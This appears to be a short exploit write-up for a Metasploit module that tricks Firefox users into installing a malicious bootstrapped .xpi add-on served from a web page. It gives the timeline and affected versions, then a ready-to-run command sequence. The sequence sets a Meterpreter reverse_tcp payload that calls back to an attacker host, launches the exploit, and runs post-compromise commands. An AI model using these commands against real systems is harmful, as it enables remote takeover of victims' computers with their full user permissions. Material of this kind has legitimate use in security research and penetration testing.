Timeline :

Vulnerability found Jason Avery the 2007-06-27
Metasploit PoC provided the 2012-04-10

PoC provided by :

mihi

Reference(s) :

None

Affected version(s) :

All versions of Mozilla Firefox

Tested on Windows XP Pro SP3 with :

Mozilla Firefox 11.0

Description :

This exploit dynamically creates a .xpi add-on file. The resulting bootstrapped Firefox add-on is presented to the victim via a web page with. The victim’s Firefox browser will pop a dialog asking if they trust the add-on. Once the user clicks “install”, the add-on is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the add-on is marked to be “bootstrapped”. As the add-on will execute the payload after each Firefox restart, an option can be given to automatically uninstall the add-on once the payload has been executed.

Commands :

use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo